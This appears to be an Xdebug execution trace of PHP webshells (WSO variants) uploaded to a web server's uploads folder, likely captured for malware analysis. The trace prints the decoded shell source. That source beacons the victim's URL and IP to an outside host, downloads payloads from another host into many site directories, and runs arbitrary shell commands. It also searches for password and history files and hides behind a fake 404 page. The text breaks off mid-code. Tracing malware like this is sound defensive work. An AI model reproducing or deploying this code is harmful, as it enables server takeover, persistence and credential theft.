"/modules/css.php" ;\r\n$text123456789101112131415 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789101112131415 = fopen($check123456789101112131415, \'w\');\r\nfwrite($open123456789101112131415, $text123456789101112131415);\r\nfclose($open123456789101112131415);\r\nif(file_exists($check123456789101112131415)){\r\n}\r\n$check12345678910111213141516 = $_SERVER[\'DOCUMENT_ROOT\'] . "/includes/css.php" ;\r\n$text12345678910111213141516 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516 = fopen($check12345678910111213141516, \'w\');\r\nfwrite($open12345678910111213141516, $text12345678910111213141516);\r\nfclose($open12345678910111213141516);\r\nif(file_exists($check12345678910111213141516)){\r\n}\r\n$check1234567891011121314151617 = $_SERVER[\'DOCUMENT_ROOT\'] . "/phpinfo.php" ;\r\n$text1234567891011121314151617 = http_get(\'http://phpshell.in/txt/phpinfo.txt\');\r\n$open1234567891011121314151617 = fopen($check1234567891011121314151617, \'w\');\r\nfwrite($open1234567891011121314151617, $text1234567891011121314151617);\r\nfclose($open1234567891011121314151617);\r\nif(file_exists($check1234567891011121314151617)){\r\n}\r\n$check123456789101112131415161718 = $_SERVER[\'DOCUMENT_ROOT\'] . "/.well-known/css.php" ;\r\n$textk123456789101112131415161718 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk123456789101112131415161718 = fopen($checkk123456789101112131415161718, \'w\');\r\nfwrite($openk123456789101112131415161718, $textk123456789101112131415161718);\r\nfclose($openk123456789101112131415161718);\r\nif(file_exists($checkk123456789101112131415161718)){\r\n}\r\n$checkk12345678910111213141516171819 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/sites/css.php" ;\r\n$text12345678910111213141516171819 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516171819 = fopen($check12345678910111213141516171819, \'w\');\r\nfwrite($open12345678910111213141516171819, $text12345678910111213141516171819);\r\nfclose($open12345678910111213141516171819);\r\nif(file_exists($check12345678910111213141516171819)){\r\n}\r\n$check1234567891011121314151617181920 = $_SERVER[\'DOCUMENT_ROOT\'] . "/tmp/css.php" ;\r\n$text1234567891011121314151617181920 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314151617181920 = fopen($check1234567891011121314151617181920, \'w\');\r\nfwrite($open1234567891011121314151617181920, $text1234567891011121314151617181920);\r\nfclose($open1234567891011121314151617181920);\r\nif(file_exists($check1234567891011121314151617181920)){\r\n}\r\n?>\r\n'	/var/www/html/uploads/wso.php(4) : eval()'d code	1	0
4	13	0	0.007940	1143752	base64_decode	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	16	1	'aHR0cDovL2J5cjAwdC5jby9sLQ=='
4	13	1	0.007962	1143840
4	13	R			'http://byr00t.co/l-'
4	14	0	0.007980	1143808	GetIP	1		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	16	0
5	15	0	0.007994	1143808	getenv	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	3	1	'HTTP_CLIENT_IP'
5	15	1	0.008013	1143840
5	15	R			FALSE
5	16	0	0.008028	1143808	getenv	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	5	1	'HTTP_X_FORWARDED_FOR'
5	16	1	0.008044	1143840
5	16	R			FALSE
5	17	0	0.008058	1143808	getenv	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	12	1	'REMOTE_ADDR'
5	17	1	0.008073	1143880
5	17	R			'127.0.0.1'
4		A						/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	12	$ip = '127.0.0.1'
4	14	1	0.008101	1143848
4	14	R			'127.0.0.1'
4	18	0	0.008116	1143872	base64_encode	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	16	1	'http://localhost/uploads/wso.php'
4	18	1	0.008131	1143984
4	18	R			'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzby5waHA='
3		A						/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	16	$x = 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzby5waHA='
4	19	0	0.008165	1143864	function_exists	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	17	1	'curl_init'
4	19	1	0.008179	1143904
4	19	R			TRUE
4	20	0	0.008193	1143864	curl_init	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	19	0
4	20	1	0.008215	1144776
4	20	R			resource(3) of type (curl)
3		A						/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	19	$ch = resource(3) of type (curl)
4	21	0	0.008244	1144776	curl_setopt	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	10002	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzby5waHA='
4	21	1	0.008265	1144872
4	21	R			TRUE
4	22	0	0.008278	1144776	curl_setopt	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	19913	TRUE
4	22	1	0.008294	1144872
4	22	R			TRUE
4	23	0	0.008307	1144776	curl_exec	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	23	1	0.055260	1144808
4	23	R			''
3		A						/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	19	$gitt = ''
4	24	0	0.055321	1144776	curl_close	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	24	1	0.055390	1143920
4	24	R			NULL
4	25	0	0.055408	1143888	file_get_contents	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	21	1	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzby5waHA='
4	25	1	0.662387	1147584
4	25	R			''
3		A						/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	21	$gitt = ''
3		A						/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	26	$auth_pass = 'a6d13df8a46cf713e5cda6a6c0d043bf'
3		A						/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	27	$color = '#00ff66'
3		A						/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	28	$default_action = 'FilesMan'
4	26	0	0.662501	1147544	define	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	29	2	'SELF_PATH'	'/var/www/html/uploads/wso.php(4) : eval()\'d code(1) : eval()\'d code'
4	26	1	0.662548	1147648
4	26	R			TRUE
4	27	0	0.662564	1147576	strpos	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	30	2	'python-requests/2.25.1'	'Google'
4	27	1	0.662606	1147648
4	27	R			FALSE
4	28	0	0.662629	1147576	session_start	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	32	0
4	28	1	0.662698	1148328
4	28	R			TRUE
4	29	0	0.662714	1148328	error_reporting	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	33	1	0
4	29	1	0.662728	1148368
4	29	R			0
4	30	0	0.662742	1148328	ini_set	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	34	2	'error_log'	NULL
4	30	1	0.662758	1148400
4	30	R			''
4	31	0	0.662771	1148328	ini_set	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	35	2	'display_errors'	0
4	31	1	0.662786	1148400
4	31	R			''
4	32	0	0.662798	1148328	ini_set	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	36	2	'log_errors'	0
4	32	1	0.662812	1148400
4	32	R			'1'
4	33	0	0.662825	1148328	ini_set	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	37	2	'max_execution_time'	0
4	33	1	0.662841	1148432
4	33	R			'30'
4	34	0	0.662853	1148328	set_time_limit	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	38	1	0
4	34	1	0.662868	1148392
4	34	R			FALSE
3	12	1	0.662890	1149824
2	7	1	0.662907	1062800
1	3	1	0.662915	1061224
1	35	0	0.662922	1061256	Error->__toString	0		Unknown	0	0
2	36	0	0.662934	1061336	Error->getTraceAsString	0		Unknown	0	0
2	36	1	0.662946	1061592
2	36	R			'#0 /var/www/html/uploads/wso.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso.php(4): eval()\n#2 {main}'
1	35	1	0.662966	1065728
1	35	R			'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/wso.php(4) : eval()\'d code(1) : eval()\'d code:39\nStack trace:\n#0 /var/www/html/uploads/wso.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso.php(4): eval()\n#2 {main}'
			0.663017	986224
TRACE END   [2023-02-12 22:59:58.609456]

data/traces/9d98853a714da34855a92cb5ba345601_trace-1676256279.2748.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:45:05.172639]
1	0	1	0.000188	393528
1	3	0	0.000426	426944	{main}	1		/var/www/html/uploads/wso1.php.PDF	0	0
1		A						/var/www/html/uploads/wso1.php.PDF	2	$stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
1		A						/var/www/html/uploads/wso1.php.PDF	3	$stt0 = '[base64 string omitted]'
2	4	0	0.000508	426944	base64_decode	0		/var/www/html/uploads/wso1.php.PDF	4	1	'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
2	4	1	0.000528	427104
2	4	R			'[binary data omitted]'
2	5	0	0.000550	427072	gzinflate	0		/var/www/html/uploads/wso1.php.PDF	4	1	'[binary data omitted]'
2	5	1	0.000574	427200
2	5	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	0	0.000592	427040	htmlspecialchars_decode	0		/var/www/html/uploads/wso1.php.PDF	4	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	1	0.000610	427072
2	6	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	7	0	0.000638	428600	eval	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'	/var/www/html/uploads/wso1.php.PDF	4	0
3	8	0	0.000655	428600	strrev	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code	1	1	'[base64 string omitted]'
3	8	1	0.000708	461400
3	8	R			'[base64 string omitted]'
3	9	0	0.000754	461368	base64_decode	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code	1	1	'[base64 string omitted]'
3	9	1	0.000869	494168
3	9	R			'[binary data omitted]'
3	10	0	0.001317	461368	gzinflate	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code	1	1	'[binary data omitted]'
3	10	1	0.001767	485976
3	10	R			'[binary data omitted]'
3	11	0	0.002215	453176	gzuncompress	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code	1	1	'[binary data omitted]'
3	11	1	0.002922	539224
3	11	R			'<?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\''
3	12	0	0.005737	1143856	eval	1	'?><?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\'http://\'.$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']);\r\nif(function_exists(\'curl_init\'))\r\n{\r\n    $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);\r\n    if($gitt == false){\r\n        @$gitt = file_get_contents($x);\r\n    }\r\n}elseif(function_exists(\'file_get_contents\')){\r\n    @$gitt = file_get_contents($x);\r\n}\r\n?><?php $auth_pass = "a6d13df8a46cf713e5cda6a6c0d043bf";\r\n $color = "#00ff66";\r\n $default_action = \'FilesMan\';\r\n @define(\'SELF_PATH\', __FILE__);\r\n if( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set(\'error_log\',NULL);\r\n @ini_set(\'display_errors\',0);\r\n @ini_set(\'log_errors\',0);\r\n @ini_set(\'max_execution_time\',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define(\'VERSION\', \'\');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? 
array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n } $_POST = stripslashes_array($_POST);\r\n } function printLogin() { echo \'<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at \'.$_SERVER[\'HTTP_HOST\'].\' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>\';\r\n exit;\r\n } if( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) if( empty( $auth_pass ) || ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = \'win\';\r\n else $os = \'nix\';\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $home_cwd = @getcwd();\r\n if( isset( $_POST[\'c\'] ) ) @chdir($_POST[\'c\']);\r\n $cwd = @getcwd();\r\n if( $os == \'win\') { $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\';\r\n if($os == \'win\') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );\r\n } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . 
-type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \\"config*\\"", "find config* files in current dir" => "find . -type f -name \\"config*\\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . 
-type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );\r\n } function ex($in) { $out = \'\';\r\n if(function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n }elseif(function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n }elseif(is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } function which($p) { $path = ex(\'which \'.$p);\r\n if(!empty($path)) return $path;\r\n return false;\r\n } function printHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = "UTF-8";\r\n global $color;\r\n echo 
\'<html><head><meta http-equiv="Content-Type" content="text/html;\r\n charset=\'.$_POST[\'charset\'].\'"><title>r00t.info wso Shell</title><link REL="SHORTCUT ICON" HREF="http://imagizer.imageshack.us/a/img440/4273/6fix.png">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:\'.$color.\' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid \'.$color.\';\r\n font: 9pt Monospace,"Courier New";\r\n }\r\n input[type="button"]:hover,input[type="submit"]:hover {background-color:\'.$color.\';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n 
.logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = "ajax=true";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr("\'.$_SERVER[\'REQUEST_URI\'].\'", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject("Microsoft.XMLHTTP");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( 
(req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp("(\\\\d+)([\\\\S\\\\s]*)", "m");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert("Request error!");\r\n\r\n }\r\n </script>\r\n <head><body><div style="position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n"><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n <form method=post name=mf style="display:none;\r\n">\r\n <input type=hidden name=a value="\'.(isset($_POST[\'a\'])?$_POST[\'a\']:\'\').\'">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="\'.(isset($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'">\r\n <input type=hidden name=p2 value="\'.(isset($_POST[\'p2\'])?htmlspecialchars($_POST[\'p2\']):\'\').\'">\r\n <input type=hidden name=p3 value="\'.(isset($_POST[\'p3\'])?htmlspecialchars($_POST[\'p3\']):\'\').\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n </form>\';\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n if(!function_exists(\'posix_getegid\')) { $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else { $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n } $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0;\r\n$i<$n-1;\r\n$i++) { $cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n 
for($j=0;\r\n$j<=$i;\r\n$j++) $cwd_links .= $path[$j].\'/\';\r\n $cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item) $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Delete LOG\'=>\'DeleteLOG\',\'Safe Mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Cgi\'=>\'Cgi\',\'Network\'=>\'Network\',\'Readable Dirs\'=>\'Readable\',\'Port Scanner\'=>\'PortScanner\',\'Symlink\'=>\'Symlink\',\'SQLBUDDY\'=>\'SQLBUDDY\',\'Bypass\'=>\'Bypass\',\'Python\'=>\'Python\');\r\n if(!empty($GLOBALS[\'auth_pass\'])) $m[\'SelfKill\'] = \'SelfRemove\';\r\n $m[\'Logout\'] = \'Logout\';\r\n $menu = \'\';\r\n foreach($m as $k => $v) $menu .= \'<th><a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a></th>\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') { foreach( range(\'a\',\'z\') as $drive ){ if (is_dir($drive.\':\\\\\')) $drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n } $drives .= \'<br />: \';\r\n } if($GLOBALS[\'os\'] == \'nix\') { $dominios = @file_get_contents("/etc/named.conf");\r\n if(!$dominios) { $d0c = "CANT READ named.conf";\r\n } else { @preg_match_all(\'/.*?zone "(.*?)" {/\', $dominios, $out);\r\n $out = sizeof(array_unique($out[1]));\r\n $d0c = $out." 
Domains";\r\n } } else { $d0c = " --- ";\r\n } if($GLOBALS[\'os\'] == \'nix\' ) { $usefl = \'\';\r\n $dwnldr = \'\';\r\n if(!@ini_get(\'safe_mode\')) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n foreach($userful as $item) { if(which($item)) $usefl.= $item.\',\';\r\n } $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.\',\';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } echo \'<table class="info" cellpadding="0" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo"><img src="http://i.hizliresim.com/z4lrbR.png" id="logo" height="75%" width="90%"/></div><hr style="margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n"><div class="eca1"></div><div class="eca2">Hackers</div></td>\r\n <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;\r\n"><span>Uname</span></td><td>: <nobr>\'.substr(@php_uname(), 0, 120).\'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: \'.$uid.\' ( \'.$user.\' ) <span>Group: </span> \'.$gid.\' ( \'.$group.\' )</td></tr><tr><td><span>Server</span></td><td>: \'.@getenv(\'SERVER_SOFTWARE\').\'</td></tr><tr><td><span>Useful</span></td><td>: \'.$usefl.\'</td></tr><tr><td><span>Downloaders</span></td><td>: \'.$dwnldr.\'</td></tr><tr><td><span>Disabled functions</span></td><td>: \'.($disable_functions?$disable_functions:\'All Function Enable\').\'</td></tr><tr><td><span>\'.($GLOBALS[\'os\'] == \'win\'?\'Drives<br />Cwd\':\'Cwd\').\'</span></td><td>: \'.$drives.\'\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a></td></tr></table></td>\'. 
